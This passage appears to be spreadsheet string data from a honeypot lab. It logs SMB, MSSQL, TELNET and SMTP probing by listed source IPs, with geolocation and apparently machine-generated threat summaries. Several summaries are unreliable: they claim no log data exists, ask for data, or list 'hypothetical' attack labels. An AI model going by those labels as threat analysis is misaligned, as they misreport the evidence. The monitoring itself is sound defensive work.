  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H46</t>
  </si>
  <si>
    <t>Azerbaijan</t>
  </si>
  <si>
    <t>BA</t>
  </si>
  <si>
    <t>Baki</t>
  </si>
  <si>
    <t>Baku (Səbail)</t>
  </si>
  <si>
    <t>587084</t>
  </si>
  <si>
    <t>40.3728</t>
  </si>
  <si>
    <t>49.8434</t>
  </si>
  <si>
    <t>39232</t>
  </si>
  <si>
    <t>Uninet LLC</t>
  </si>
  <si>
    <t>CityNET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,57476)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,57598)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,55892)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,56078)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,51288)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,51536)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,59987)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,60638)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,50306)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,54933)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,58939)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,58988)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,59999)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,60055)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,57445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,56457)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,56496)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,51971)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,52088)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,62851)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,62924)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,60990)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,61038)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53206)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53290)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,50634)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,50725)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53802)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53890)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53793)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,53859)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,63146)}&amp;&amp;{Data_SMB:Incoming connection (78.109.53.98,63237)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:4e6d:3562</t>
  </si>
  <si>
    <t>9163107138d6d65bc5b73b5a16138096</t>
  </si>
  <si>
    <t>66.63.187.183</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H47</t>
  </si>
  <si>
    <t>214943</t>
  </si>
  <si>
    <t>Railnet LLC</t>
  </si>
  <si>
    <t>HostPapa</t>
  </si>
  <si>
    <t>Virtualine Technologies</t>
  </si>
  <si>
    <t>{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 14 Apr 2025 15:39:09 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@chartersills.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mrjohnson106@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;micheal.king95@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;keithwarren94@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '156.244.37.11_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 16 Apr 2025 07:36:23 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@zapel.com&gt;', 'command': 'MAIL', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:423f:bbb7</t>
  </si>
  <si>
    <t>High&amp;&amp;Medium&amp;&amp;Low</t>
  </si>
  <si>
    <t>An attempt to reset the SMTP connection, possibly indicating an attacker trying to reuse or hide their email session. This can be a sign of malicious activity as it may help evade detection or bypass security measures. It is likely an attack on the system's email functionality. &amp;&amp; Malicious actor is attempting to reset SMTP connection likely for spamming or brute force attacks on a mail server.
They're possibly trying to reuse the connection after a failed login attempt to bypass rate limits.
This activity suggests an attempt to exploit mail server vulnerabilities.</t>
  </si>
  <si>
    <t>Scanning Attempt</t>
  </si>
  <si>
    <t>b43dd84c78f889d08d0d42e74d48d26c</t>
  </si>
  <si>
    <t>197.134.252.161</t>
  </si>
  <si>
    <t>EG</t>
  </si>
  <si>
    <t>Egypt</t>
  </si>
  <si>
    <t>Cairo</t>
  </si>
  <si>
    <t>360630</t>
  </si>
  <si>
    <t>30.0444</t>
  </si>
  <si>
    <t>31.2357</t>
  </si>
  <si>
    <t>24835</t>
  </si>
  <si>
    <t>Vodafone Data - Egypt</t>
  </si>
  <si>
    <t>Vodafone Data</t>
  </si>
  <si>
    <t>::ffff:c586:fca1</t>
  </si>
  <si>
    <t>6df09b5d77bd0cf85c5ea1c6d671832b</t>
  </si>
  <si>
    <t>103.182.116.146</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;35312&amp;&amp;NA</t>
  </si>
  <si>
    <t>Guntur</t>
  </si>
  <si>
    <t>Mangalagiri</t>
  </si>
  <si>
    <t>1263797</t>
  </si>
  <si>
    <t>16.4308</t>
  </si>
  <si>
    <t>80.5682</t>
  </si>
  <si>
    <t>135765</t>
  </si>
  <si>
    <t>WEBMAX NETWORK SOLUTIONS PRIVATE LIMITED</t>
  </si>
  <si>
    <t>Webmax Network Solutions Private Limited</t>
  </si>
  <si>
    <t>::ffff:67b6:7492</t>
  </si>
  <si>
    <t>9991569a1266d2645b43f27340c9d232</t>
  </si>
  <si>
    <t>207.170.56.46</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Arkansas</t>
  </si>
  <si>
    <t>Pulaski</t>
  </si>
  <si>
    <t>Little Rock (River Mountain)</t>
  </si>
  <si>
    <t>4119403</t>
  </si>
  <si>
    <t>72212</t>
  </si>
  <si>
    <t>34.7867</t>
  </si>
  <si>
    <t>-92.3969</t>
  </si>
  <si>
    <t>7029</t>
  </si>
  <si>
    <t>Windstream Communications LLC</t>
  </si>
  <si>
    <t>::ffff:cfaa:382e</t>
  </si>
  <si>
    <t>No log data provided, unable to analyze for malicious activity.</t>
  </si>
  <si>
    <t>I need the log data to analyze it. Please provide it, and I'll give you the results as per your requirements.</t>
  </si>
  <si>
    <t>5cc7d54a8ae37248eafcb68033e68c52</t>
  </si>
  <si>
    <t>122.36.187.5</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>Yongsan-gu</t>
  </si>
  <si>
    <t>Yongsan-dong (Hangang-daero)</t>
  </si>
  <si>
    <t>6800487</t>
  </si>
  <si>
    <t>37.5379</t>
  </si>
  <si>
    <t>126.97</t>
  </si>
  <si>
    <t>17858</t>
  </si>
  <si>
    <t>LG POWERCOMM</t>
  </si>
  <si>
    <t>Xpeed</t>
  </si>
  <si>
    <t>::ffff:7a24:bb05</t>
  </si>
  <si>
    <t>ca59811b5d3d66548e59964cd7dd7f38</t>
  </si>
  <si>
    <t>217.54.70.10</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;15167&amp;&amp;1433&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>GZ</t>
  </si>
  <si>
    <t>Giza</t>
  </si>
  <si>
    <t>Dokki</t>
  </si>
  <si>
    <t>360995</t>
  </si>
  <si>
    <t>30.0482</t>
  </si>
  <si>
    <t>31.2062</t>
  </si>
  <si>
    <t>36992</t>
  </si>
  <si>
    <t>ETISALAT MISR</t>
  </si>
  <si>
    <t>Etisalat</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,59379)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,55225)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,55404)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,55870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,55957)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,50154)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,50224)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,49436)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,49553)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,61629)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,61726)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,63927)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,64184)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,57445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,50096)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,50232)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,49790)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,49888)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,57094)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,57695)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,62747)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,62899)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,56576)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,56767)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,63453)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,63551)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,64400)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (217.54.70.10,64478)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:d936:460a</t>
  </si>
  <si>
    <t>cefb8cf1d47bbe9c9ad381862b7787d3</t>
  </si>
  <si>
    <t>217.35.70.149</t>
  </si>
  <si>
    <t>host217-35-70-149.in-addr.btopenworld.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;56146&amp;&amp;NA</t>
  </si>
  <si>
    <t>London (South Bank)</t>
  </si>
  <si>
    <t>SE1</t>
  </si>
  <si>
    <t>51.5037</t>
  </si>
  <si>
    <t>-0.111676</t>
  </si>
  <si>
    <t>2856</t>
  </si>
  <si>
    <t>British Telecommunications PLC</t>
  </si>
  <si>
    <t>BT Public Internet Service</t>
  </si>
  <si>
    <t>::ffff:d923:4695</t>
  </si>
  <si>
    <t>7b41b280a9a920fe0e11cd1a632ce8aa</t>
  </si>
  <si>
    <t>220.135.160.52</t>
  </si>
  <si>
    <t>220-135-160-52.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>::ffff:dc87:a034</t>
  </si>
  <si>
    <t>The observed activities indicate a reconnaissance phase by the attacker, scanning for vulnerable services and attempting to connect to them. The attacker is likely using automated tools to quickly scan multiple ports and protocols. &amp;&amp; The activity observed appears to be reconnaissance and scanning by an attacker, attempting to identify and exploit vulnerabilities in various services on the network. The attacker is probing for open ports, testing authentication credentials, and gathering information about the network devices.</t>
  </si>
  <si>
    <t xml:space="preserve">Scanning &amp;&amp;  Port scanning and reconnaissance. </t>
  </si>
  <si>
    <t>15b8b4b13380032b3582bb2f6ec88796</t>
  </si>
  <si>
    <t>196.221.165.242</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_MT-CPA_H43</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;43093&amp;&amp;NA&amp;&amp;15839&amp;&amp;34544&amp;&amp;34543&amp;&amp;35001&amp;&amp;60101&amp;&amp;21199</t>
  </si>
  <si>
    <t>الحوامدية</t>
  </si>
  <si>
    <t>Al Ḩawāmidīyah</t>
  </si>
  <si>
    <t>361179</t>
  </si>
  <si>
    <t>29.9012</t>
  </si>
  <si>
    <t>31.2727</t>
  </si>
  <si>
    <t>::ffff:c4dd:a5f2</t>
  </si>
  <si>
    <t>This indicates an attempt to establish a connection, but the specific service or protocol is unknown as it's designated "TELNET", which is a common remote access protocol that might be exploited for malicious purposes. The fact that there's no activity recorded suggests the attempt was unsuccessful. This could be a probing or reconnaissance effort by an attacker. &amp;&amp; No log data provided, unable to analyze or provide information about possible malicious activity.</t>
  </si>
  <si>
    <t>Since there's no log data provided, I'll start fresh. Here are some hypothetical examples:
1. **Scanning**
2. **Bruteforce**
3. **SQLi** 
4. **DDoS** 
5. **Portscan**</t>
  </si>
  <si>
    <t>1a657d89e4d15ac1deaaa11c410c113b</t>
  </si>
  <si>
    <t>190.26.208.130</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MSSQL_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>CO</t>
  </si>
  <si>
    <t>Colombia</t>
  </si>
  <si>
    <t>DC</t>
  </si>
  <si>
    <t>Bogota D.C.</t>
  </si>
  <si>
    <t>Bogotá  D.C.</t>
  </si>
  <si>
    <t>Bogotá (Teusaquillo)</t>
  </si>
  <si>
    <t>3688689</t>
  </si>
  <si>
    <t>111321</t>
  </si>
  <si>
    <t>4.64758</t>
  </si>
  <si>
    <t>-74.1017</t>
  </si>
  <si>
    <t>19429</t>
  </si>
  <si>
    <t>ETB - Colombia</t>
  </si>
  <si>
    <t>EPS CONVIDA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,59433)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,3267)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,9153)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,8324)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,43780)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,63608)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,65079)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,62488)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,1210)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,59059)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,16000)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,7198)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,3573)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,13624)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,52182)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,46986)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,24673)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,64827)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,32687)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,59621)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,8770)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (190.26.208.130,55807)}</t>
  </si>
  <si>
    <t>::ffff:be1a:d082</t>
  </si>
  <si>
    <t>It appears that the attacker is conducting a reconnaissance and scanning of various services on the network to identify vulnerabilities and potential entry points for further exploitation. &amp;&amp; No log data provided, therefore no information can be analyzed or described.</t>
  </si>
  <si>
    <t>The attacker seems to be attempting to:</t>
  </si>
  <si>
    <t>c09b0b83eb7efbeed4eb0f0a1e606295</t>
  </si>
  <si>
    <t>167.94.138.112</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;SIP Endpoint Enumeration</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_IPP_H38&amp;&amp;SMA-LAB_IPP_H21&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_IRC_H22&amp;&amp;SMA-LAB_IRC_H8&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_SIP_H10&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_IPP_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_IPP_H40&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_ORACLE_H36&amp;&a